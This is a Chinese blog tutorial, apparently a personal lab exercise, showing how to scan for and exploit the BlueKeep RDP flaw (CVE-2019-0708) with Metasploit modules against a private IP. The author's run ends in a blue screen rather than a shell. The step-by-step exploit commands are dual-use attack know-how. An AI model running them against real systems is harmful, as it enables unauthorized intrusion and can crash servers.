Metasploit -- CVE-2019-0708漏洞检测及利用

“医生,我得了严重的抑郁症,你能给我看看吗” “我们这有全市最搞笑的小丑,他应该能治好你的病” “医生,我就是那个小丑!”

----  网易云热评

一、漏洞简介

Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证, 不用任何的交互, 直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。这个漏洞是今年来说危害严重性最大的漏洞,换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年Wanna Cry恶意软件在全球蔓延一样, 跟之前的勒索,永恒之蓝病毒差不多。

 

二、漏洞检测

1、打开Metasploit,搜索CVE-2019-0708

2、选择auxiliary/scanner/rdp/cve_2019_0708_bluekeep,检测漏洞是否存在

3、查看需要设置的参数show options

4、设置目标主机ip set rhosts 192.168.1.129

5、run,检测出现The target is vulnerable,目标很脆弱,说明存在漏洞

 

三、漏洞利用

1、选择攻击模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看攻击目标的环境show targets

3、设置模块需要的环境 set target 5

4、查看模块需要的参数 show options

5、设置攻击目标ip set rhosts 192.168.1.129

6、run,攻击

 

7、目标主机出现蓝屏

总结,理论上应该就取得了目标主机的shell,但是我的却是蓝屏,网上有的说多试几次就好,有的说是设置的target问题,都试过了,但是我最终还是没能成功。。。。

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值